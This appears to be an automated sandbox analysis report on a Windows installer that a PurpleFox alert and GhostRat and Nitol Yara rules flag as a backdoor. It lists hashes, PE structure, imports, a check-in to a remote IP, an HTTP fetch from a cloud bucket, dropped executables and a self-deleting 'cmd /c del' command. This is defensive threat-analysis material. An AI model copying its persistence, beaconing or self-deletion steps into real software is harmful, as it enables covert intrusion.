                                                              • Win32 Executable (generic) a (10002005/4) 98.39%
                                                              • Windows ActiveX control (116523/4) 1.15%
                                                              • InstallShield setup (43055/19) 0.42%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              File name:setup#U67e5#U8be2_pf2024.exe
                                                              File size:24'674'304 bytes
                                                              MD5:0b69b1391c949736c21ff137d4183b28
                                                              SHA1:754b3f30c29157940b35d865c6c1ebdb2dacb0cb
                                                              SHA256:a0e1d31cb9dc7495d9a907d91554c95d9301a75e7a639d300717e77e1ef11d64
                                                              SHA512:5b04d000fdd24613538a1c838685841d9c0a480696e403dc199e9a3423f0d79f69ab9de129c3c40d469609edd09f9d0839c48a219e0123a44f37f7e28815887e
                                                              SSDEEP:393216:JxGjJsw6OPnx/h7x/eJWGhrr2NCvZFObNWjqRWpMyi:LGmYFxzGhxvZEbU/pMyi
                                                              TLSH:8547D021FA66C03BD251127098BE867E9E3D7ED40B204CC3AB95BE4D39F52D18E77942
                                                              Icon Hash:7c87e1bcf5fd1c01
                                                              Entrypoint:0x49d818
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:
                                                              Time Stamp:0x65F2A58F [Thu Mar 14 07:21:51 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:e750e54b2eb084a7cf35fa6127d05a52
                                                              Instruction
                                                              clc
                                                              jmp 00007F7900B9B1A1h
                                                              jnl 00007F7900B9B125h
                                                              pushad
                                                              pop dword ptr [ecx]
                                                              sbb ebp, dword ptr [esi]
                                                              retn C1CEh
                                                              push esi
                                                              aaa
                                                              loop 00007F7900B9B1ECh
                                                              jmp 00007F7900B9B18Ah
                                                              add byte ptr [esi-63FC631Bh], bl
                                                              push ss
                                                              retf 9D73h
                                                              pushad
                                                              inc ecx
                                                              push esi
                                                              pop ebp
                                                              and al, 60h
                                                              jmp 00007F7900B9B19Bh
                                                              std
                                                              add dh, cl
                                                              push ecx
                                                              scasd
                                                              shr al, cl
                                                              cdq
                                                              pop edx
                                                              xchg ch, ah
                                                              mov seg?, sp
                                                              xchg eax, edx
                                                              jnp 00007F7900B9B164h
                                                              cmc
                                                              aad 17h
                                                              push ds
                                                              push esp
                                                              retn E672h
                                                              mov bl, E8h
                                                              adc dword ptr [eax], eax
                                                              add byte ptr [eax], al
                                                              jle 00007F7900B9B15Ah
                                                              sar dh, cl
                                                              lea ebx, dword ptr [edx+74h]
                                                              shl dword ptr [ecx], cl
                                                              movsb
                                                              lds edx, fword ptr [esi-1515E80Ch]
                                                              pop esi
                                                              jmp 00007F7900B9B1AAh
                                                              mov cl, 75h
                                                              jmp far 437Ah : BD3775F9h
                                                              sbb dh, byte ptr [ebx+esi*2+3Ah]
                                                              retf 0BDEh
                                                              cmp dh, al
                                                              dec ebx
                                                              fidiv word ptr [ebx-1B0A6D48h]
                                                              add bl, byte ptr [ecx-0Bh]
                                                              sub ebx, dword ptr [ecx+16AF9690h]
                                                              aas
                                                              push edi
                                                              inc ebp
                                                              or al, byte ptr [edx-6E397E8Fh]
                                                              Programming Language:
                                                              • [ C ] VS98 (6.0) SP6 build 8804
                                                              • [C++] VS98 (6.0) SP6 build 8804
                                                              • [C++] VS98 (6.0) build 8168
                                                              • [ C ] VS98 (6.0) build 8168
                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                              Name | Virtual Address | Virtual Size | Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x173fd58 | 0x12c | .rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x179d000 | 0x2c058 | .rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9dbf4 | 0x8 | .text
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x9e000 | 0x708 | .rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                              .text | 0x1000 | 0x9cbfc | 0x9d000 | 32fe94efaa7c3c91943b323f540ac818 | False | 0.6729977358678344 | data | 7.453269170375049 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rdata | 0x9e000 | 0x16a4200 | 0x16a5000 | fe987b1bbdf9f968f985fe9a8b6a34cf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data | 0x1743000 | 0x593e8 | 0x18000 | 8764a056e8f0a959fb67a365f42c194e | False | 0.33984375 | data | 6.259092758296548 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc | 0x179d000 | 0x2d000 | 0x2d000 | 3b161b27a20b54092642a89adec04cc7 | False | 0.2806260850694444 | data | 4.8524930302647515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
TEXTINCLUDE | 0x179dbe4 | 0xb | ASCII text, with no line terminators | Chinese | China | 1.7272727272727273
TEXTINCLUDE | 0x179dbf0 | 0x16 | data | Chinese | China | 1.3636363636363635
TEXTINCLUDE | 0x179dc08 | 0x151 | C source, ASCII text, with CRLF line terminators | Chinese | China | 0.6201780415430267
RT_CURSOR | 0x179dd5c | 0x134 | data | Chinese | China | 0.5811688311688312
RT_CURSOR | 0x179de90 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.37662337662337664
RT_CURSOR | 0x179dfc4 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.4805194805194805
RT_CURSOR | 0x179e0f8 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | Chinese | China | 0.7
RT_BITMAP | 0x179e1ac | 0x248 | Device independent bitmap graphic, 64 x 15 x 4, image size 480 | Chinese | China | 0.3407534246575342
RT_BITMAP | 0x179e3f4 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | Chinese | China | 0.4444444444444444
RT_BITMAP | 0x179e538 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m | Chinese | China | 0.26453488372093026
RT_BITMAP | 0x179e690 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m | Chinese | China | 0.2616279069767442
RT_BITMAP | 0x179e7e8 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m | Chinese | China | 0.2441860465116279
RT_BITMAP | 0x179e940 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m | Chinese | China | 0.24709302325581395
RT_BITMAP | 0x179ea98 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240, resolution 3780 x 3780 px/m | Chinese | China | 0.2238372093023256
RT_BITMAP | 0x179ebf0 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | Chinese | China | 0.19476744186046513
RT_BITMAP | 0x179ed48 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | Chinese | China | 0.20930232558139536
RT_BITMAP | 0x179eea0 | 0x158 | Device independent bitmap graphic, 20 x 20 x 4, image size 240 | Chinese | China | 0.18895348837209303
RT_BITMAP | 0x179eff8 | 0x5e4 | Device independent bitmap graphic, 70 x 39 x 4, image size 1404 | Chinese | China | 0.34615384615384615
RT_BITMAP | 0x179f5dc | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | Chinese | China | 0.44565217391304346
RT_BITMAP | 0x179f694 | 0x16c | Device independent bitmap graphic, 39 x 13 x 4, image size 260 | Chinese | China | 0.28296703296703296
RT_BITMAP | 0x179f800 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | Chinese | China | 0.37962962962962965
RT_ICON | 0x179f944 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 |  |  | 0.6578014184397163
RT_ICON | 0x179fdac | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 |  |  | 0.5438524590163935
RT_ICON | 0x17a0734 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 |  |  | 0.48358348968105064
RT_ICON | 0x17a17dc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 |  |  | 0.39740663900414935
RT_ICON | 0x17a3d84 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 |  |  | 0.3423476617855456
RT_ICON | 0x17a7fac | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 |  |  | 0.32624768946395566
RT_ICON | 0x17ad434 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 |  |  | 0.2830828253100694
RT_ICON | 0x17b68dc | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 |  |  | 0.23367443511179464
RT_MENU | 0x17c7104 | 0xc | data | Chinese | China | 1.5
RT_MENU | 0x17c7110 | 0x284 | data | Chinese | China | 0.5
RT_DIALOG | 0x17c7394 | 0x98 | data | Chinese | China | 0.7171052631578947
RT_DIALOG | 0x17c742c | 0x17a | data | Chinese | China | 0.5185185185185185
RT_DIALOG | 0x17c75a8 | 0xfa | data | Chinese | China | 0.696
RT_DIALOG | 0x17c76a4 | 0xea | data | Chinese | China | 0.6239316239316239
RT_DIALOG | 0x17c7790 | 0x8ae | data | Chinese | China | 0.39603960396039606
RT_DIALOG | 0x17c8040 | 0xb2 | data | Chinese | China | 0.7359550561797753
RT_DIALOG | 0x17c80f4 | 0xcc | data | Chinese | China | 0.7647058823529411
RT_DIALOG | 0x17c81c0 | 0xb2 | data | Chinese | China | 0.6629213483146067
RT_DIALOG | 0x17c8274 | 0xe2 | data | Chinese | China | 0.6637168141592921
RT_DIALOG | 0x17c8358 | 0x18c | data | Chinese | China | 0.5227272727272727
RT_STRING | 0x17c84e4 | 0x50 | data | Chinese | China | 0.85
RT_STRING | 0x17c8534 | 0x2c | data | Chinese | China | 0.5909090909090909
RT_STRING | 0x17c8560 | 0x78 | data | Chinese | China | 0.925
RT_STRING | 0x17c85d8 | 0x1c4 | data | Chinese | China | 0.8141592920353983
RT_STRING | 0x17c879c | 0x12a | data | Chinese | China | 0.5201342281879194
RT_STRING | 0x17c88c8 | 0x146 | data | Chinese | China | 0.6288343558282209
RT_STRING | 0x17c8a10 | 0x40 | data | Chinese | China | 0.65625
RT_STRING | 0x17c8a50 | 0x64 | data | Chinese | China | 0.73
RT_STRING | 0x17c8ab4 | 0x1d8 | data | Chinese | China | 0.6758474576271186
RT_STRING | 0x17c8c8c | 0x114 | data | Chinese | China | 0.6376811594202898
RT_STRING | 0x17c8da0 | 0x24 | data | Chinese | China | 0.4444444444444444
RT_GROUP_CURSOR | 0x17c8dc4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.25
RT_GROUP_CURSOR | 0x17c8dd8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.25
RT_GROUP_CURSOR | 0x17c8dec | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | Chinese | China | 1.0294117647058822
RT_GROUP_ICON | 0x17c8e10 | 0x76 | data |  |  | 0.7627118644067796
RT_MANIFEST | 0x17c8e88 | 0x1cd | XML 1.0 document, ASCII text, with very long lines (461), with no line terminators |  |  | 0.5878524945770065
DLL | Import
RASAPI32.dll | RasGetConnectStatusA, RasHangUpA
KERNEL32.dll | ExitProcess, GetTickCount, GetCommandLineA, InterlockedIncrement, CloseHandle, InterlockedDecrement, LocalFree, WaitForSingleObject, MulDiv, GetProcAddress, GetModuleHandleA, GetVolumeInformationA, SetCurrentDirectoryA, CreateDirectoryA, DeleteFileA, SuspendThread, ReleaseMutex, CreateMutexA, GetLocalTime, DuplicateHandle, GetFileType, GetFileSize, SetFilePointer, FileTimeToLocalFileTime, lstrcpynA, lstrcmpiA, lstrcmpA, SetLastError, GetTimeZoneInformation, FileTimeToSystemTime, GetCurrentProcess, TerminateThread, CreateSemaphoreA, ResumeThread, ReleaseSemaphore, EnterCriticalSection, LeaveCriticalSection, GetProfileStringA, IsBadCodePtr, IsBadReadPtr, CompareStringW, CompareStringA, SetUnhandledExceptionFilter, GetStringTypeW, GetStringTypeA, IsBadWritePtr, VirtualAlloc, LCMapStringW, LCMapStringA, SetEnvironmentVariableA, VirtualFree, HeapCreate, HeapDestroy, GetEnvironmentVariableA, GetStdHandle, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, SetStdHandle, GetACP, HeapSize, TerminateProcess, RaiseException, GetSystemTime, RtlUnwind, WriteFile, WaitForMultipleObjects, CreateFileA, SetEvent, FindResourceA, LoadResource, LockResource, ReadFile, RemoveDirectoryA, GetModuleFileNameA, WideCharToMultiByte, MultiByteToWideChar, GetCurrentThreadId, FlushFileBuffers, GlobalSize, GlobalFree, DeleteCriticalSection, InitializeCriticalSection, lstrcatA, lstrlenA, WinExec, lstrcpyA, FindNextFileA, GlobalReAlloc, HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetFullPathNameA, FreeLibrary, LoadLibraryA, GetLastError, GetVersionExA, WritePrivateProfileStringA, CreateThread, CreateEventA, Sleep, GlobalAlloc, GlobalLock, GlobalUnlock, FindFirstFileA, FindClose, SetFileAttributesA, GetFileAttributesA, GetStartupInfoA, GetOEMCP, GetCPInfo, GetProcessVersion, SetErrorMode, GlobalFlags, GetCurrentThread, GetFileTime, TlsGetValue, LocalReAlloc, TlsSetValue, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetVersion, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, SetEndOfFile, UnlockFile, LockFile
USER32.dll | DrawTextA, wsprintfA, CloseClipboard, GetClipboardData, OpenClipboard, SetClipboardData, EmptyClipboard, GetSystemMetrics, GetCursorPos, MessageBoxA, SetWindowPos, SendMessageA, DestroyCursor, SetParent, IsWindow, PostMessageA, GetTopWindow, GetParent, GetFocus, GetClientRect, InvalidateRect, ValidateRect, UpdateWindow, EqualRect, GetWindowRect, SetForegroundWindow, DestroyMenu, IsChild, ReleaseDC, IsRectEmpty, FillRect, GetDC, SetCursor, LoadCursorA, SetCursorPos, SetActiveWindow, GetSysColor, SetWindowLongA, GetWindowLongA, RedrawWindow, EnableWindow, IsWindowVisible, OffsetRect, PtInRect, DestroyIcon, IntersectRect, InflateRect, SetRect, SetScrollPos, SetScrollRange, GetScrollRange, SetCapture, GetCapture, ReleaseCapture, SetTimer, KillTimer, WinHelpA, LoadBitmapA, CopyRect, ChildWindowFromPointEx, ScreenToClient, GetMessagePos, SetWindowRgn, DestroyAcceleratorTable, GetWindow, GetActiveWindow, SetFocus, IsIconic, PeekMessageA, GetSysColorBrush, LoadStringA, GetDesktopWindow, GetClassNameA, GetMenuCheckMarkDimensions, GetMenuState, SetMenuItemBitmaps, CheckMenuItem, MoveWindow, IsDialogMessageA, ScrollWindowEx, SendDlgItemMessageA, MapWindowPoints, AdjustWindowRectEx, CharUpperA, SetWindowTextA, GetForegroundWindow, LoadIconA, TranslateMessage, DrawFrameControl, DrawEdge, DrawFocusRect, WindowFromPoint, GetMessageA, DispatchMessageA, SetRectEmpty, RegisterClipboardFormatA, CreateIconFromResourceEx, CreateIconFromResource, DrawIconEx, CreatePopupMenu, AppendMenuA, ModifyMenuA, CreateMenu, CreateAcceleratorTableA, GetDlgCtrlID, GetSubMenu, EnableMenuItem, ClientToScreen, EnumDisplaySettingsA, LoadImageA, SystemParametersInfoA, ShowWindow, IsWindowEnabled, TranslateAcceleratorA, GetKeyState, CopyAcceleratorTableA, PostQuitMessage, IsZoomed, GetClassInfoA, DefWindowProcA, GetSystemMenu, DeleteMenu, GetMenu, SetMenu, GetWindowTextA, GetWindowTextLengthA, GetWindowDC, BeginPaint, EndPaint, TabbedTextOutA, UnregisterClassA, GrayStringA, GetDlgItem, DestroyWindow, CreateDialogIndirectParamA, EndDialog, GetNextDlgTabItem, GetWindowPlacement, RegisterWindowMessageA, GetLastActivePopup, GetMessageTime, RemovePropA, CallWindowProcA, GetPropA, UnhookWindowsHookEx, SetPropA, GetClassLongA, CallNextHookEx, SetWindowsHookExA, CreateWindowExA, GetMenuItemID, GetMenuItemCount, RegisterClassA, GetScrollPos
GDI32.dll | SetStretchBltMode, GetClipRgn, CreatePolygonRgn, SelectClipRgn, DeleteObject, CreateDIBitmap, GetSystemPaletteEntries, CreatePalette, StretchBlt, SelectPalette, RealizePalette, GetDIBits, GetWindowExtEx, GetViewportOrgEx, GetWindowOrgEx, BeginPath, EndPath, PathToRegion, CreateEllipticRgn, CreateRoundRectRgn, GetTextColor, GetBkMode, GetBkColor, GetROP2, GetStretchBltMode, GetPolyFillMode, CreateCompatibleBitmap, CreateDCA, CreateBitmap, SelectObject, GetObjectA, CreatePen, PatBlt, CombineRgn, CreateRectRgn, FillRgn, CreateSolidBrush, GetStockObject, CreateFontIndirectA, EndPage, CreateRectRgnIndirect, DeleteDC, StartDocA, StartPage, BitBlt, CreateCompatibleDC, Ellipse, Rectangle, LPtoDP, DPtoLP, GetCurrentObject, RoundRect, GetTextExtentPoint32A, GetDeviceCaps, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetTextColor, SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetClipBox, ExcludeClipRect, MoveToEx, LineTo, ExtSelectClipRgn, GetViewportExtEx, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, GetTextMetricsA, SetBkColor, EndDoc
WINMM.dll | waveOutRestart, waveOutUnprepareHeader, waveOutPrepareHeader, waveOutWrite, waveOutPause, waveOutReset, waveOutClose, waveOutGetNumDevs, waveOutOpen, midiOutUnprepareHeader, midiStreamOpen, midiStreamProperty, midiOutPrepareHeader, midiStreamOut, midiStreamStop, midiOutReset, midiStreamClose, midiStreamRestart
WINSPOOL.DRV | DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll | RegCreateKeyExA, RegCloseKey, RegOpenKeyExA, RegSetValueExA, RegQueryValueA
SHELL32.dll | Shell_NotifyIconA, ShellExecuteA
ole32.dll | CLSIDFromString, OleUninitialize, OleInitialize
OLEAUT32.dll | LoadTypeLib, RegisterTypeLib, UnRegisterTypeLib
COMCTL32.dll | ImageList_Destroy
WS2_32.dll | ioctlsocket, inet_ntoa, ntohl, accept, getpeername, WSAStartup, WSACleanup, select, send, closesocket, WSAAsyncSelect, recv, recvfrom
WININET.dll | InternetReadFile, HttpQueryInfoA, HttpSendRequestA, HttpOpenRequestA, InternetCrackUrlA, InternetCanonicalizeUrlA, InternetOpenA, InternetCloseHandle, InternetSetOptionA, InternetConnectA
comdlg32.dll | GetFileTitleA, GetSaveFileNameA, GetOpenFileNameA, ChooseColorA
Language of compilation system | Country where language is spoken | Map
Chinese | China
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/14/24-08:46:09.383883 | TCP | 2851179 | ETPRO TROJAN PurpleFox Backdoor/Rootkit Checkin M2 | 49701 | 8000 | 192.168.2.6 | 154.91.65.2
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 14, 2024 08:45:58.195528984 CET | 192.168.2.6 | 1.1.1.1 | 0x148b | Standard query (0) | chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:46:01.448816061 CET | 192.168.2.6 | 1.1.1.1 | 0x8b0f | Standard query (0) | ied-tqos.wegamex.com.hk | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:46:02.163882017 CET | 192.168.2.6 | 1.1.1.1 | 0x8f14 | Standard query (0) | tqos.wegamex.com.hk | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:46:03.159540892 CET | 192.168.2.6 | 1.1.1.1 | 0x8f14 | Standard query (0) | tqos.wegamex.com.hk | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:46:03.578248978 CET | 192.168.2.6 | 1.1.1.1 | 0xcfb3 | Standard query (0) | tqos.wegamex.com.hk | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 14, 2024 08:45:58.421515942 CET | 1.1.1.1 | 192.168.2.6 | 0x148b | No error (0) | chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com | bj.file.myqcloud.com |  | CNAME (Canonical name) | IN (0x0001) | false
Mar 14, 2024 08:45:58.421515942 CET | 1.1.1.1 | 192.168.2.6 | 0x148b | No error (0) | bj.file.myqcloud.com |  | 82.156.94.17 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:45:58.421515942 CET | 1.1.1.1 | 192.168.2.6 | 0x148b | No error (0) | bj.file.myqcloud.com |  | 82.156.94.45 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:45:58.421515942 CET | 1.1.1.1 | 192.168.2.6 | 0x148b | No error (0) | bj.file.myqcloud.com |  | 82.156.94.47 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:45:58.421515942 CET | 1.1.1.1 | 192.168.2.6 | 0x148b | No error (0) | bj.file.myqcloud.com |  | 82.156.94.48 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:45:58.421515942 CET | 1.1.1.1 | 192.168.2.6 | 0x148b | No error (0) | bj.file.myqcloud.com |  | 82.156.94.13 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:46:02.158771038 CET | 1.1.1.1 | 192.168.2.6 | 0x8b0f | No error (0) | ied-tqos.wegamex.com.hk |  | 103.7.30.61 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:46:03.563026905 CET | 1.1.1.1 | 192.168.2.6 | 0x8f14 | No error (0) | tqos.wegamex.com.hk |  | 103.7.30.83 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:46:03.563163042 CET | 1.1.1.1 | 192.168.2.6 | 0x8f14 | No error (0) | tqos.wegamex.com.hk |  | 103.7.30.83 | A (IP address) | IN (0x0001) | false
Mar 14, 2024 08:46:04.231270075 CET | 1.1.1.1 | 192.168.2.6 | 0xcfb3 | No error (0) | tqos.wegamex.com.hk |  | 103.7.30.83 | A (IP address) | IN (0x0001) | false
                                                              • chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49699 | 82.156.94.17 | 443 | 5224 | C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe

Timestamp | Bytes transferred | Direction | Data

2024-03-14 07:45:59 UTC | 196 | OUT
GET /guofucheng.txt HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com
Cache-Control: no-cache

2024-03-14 07:45:59 UTC | 420 | IN
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 5
Connection: close
Accept-Ranges: bytes
Content-Disposition: attachment
Date: Thu, 14 Mar 2024 07:45:59 GMT
ETag: "6412121cbb2dc2cb9e460cfee7046be2"
Last-Modified: Mon, 11 Mar 2024 16:16:14 GMT
Server: tencent-cos
x-cos-force-download: true
x-cos-hash-crc64ecma: 12795711674566584174
x-cos-request-id: NjVmMmFiMzdfYTNlYzIzMGJfMjljNzFfMTI0MWQwZGQ=

2024-03-14 07:45:59 UTC | 5 | IN
Data Raw: 31 30 30 38 36
Data Ascii: 10086



                                                              Target ID:0
                                                              Start time:08:45:55
                                                              Start date:14/03/2024
                                                              Path:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              Imagebase:0x400000
                                                              File size:24'674'304 bytes
                                                              MD5 hash:0B69B1391C949736C21FF137D4183B28
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:08:45:59
                                                              Start date:14/03/2024
                                                              Path:C:\Users\Wegame\Wegame.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\users\Wegame\Wegame.exe"
                                                              Imagebase:0x400000
                                                              File size:1'467'272 bytes
                                                              MD5 hash:6B54CAC74E2C36E9A34563018CE99AEA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              • Detection: 0%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:4
                                                              Start time:08:46:04
                                                              Start date:14/03/2024
                                                              Path:C:\Users\Statr\kill.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\users\Statr\kill.exe"
                                                              Imagebase:0x3b0000
                                                              File size:15'968 bytes
                                                              MD5 hash:D94C31E9C9C9A1273CC67DC6FFAF9984
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 3%, ReversingLabs
                                                              • Detection: 0%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:08:46:04
                                                              Start date:14/03/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff66e660000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:08:46:07
                                                              Start date:14/03/2024
                                                              Path:C:\ProgramData\RuntimeBroker.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\ProgramData\RuntimeBroker.exe"
                                                              Imagebase:0x570000
                                                              File size:848'200 bytes
                                                              MD5 hash:67EE3B7CA47FEC435EAB6DDE7AAEDCF7
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              • Detection: 0%, Virustotal, Browse
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:8
                                                              Start time:08:46:12
                                                              Start date:14/03/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul
                                                              Imagebase:0x1c0000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
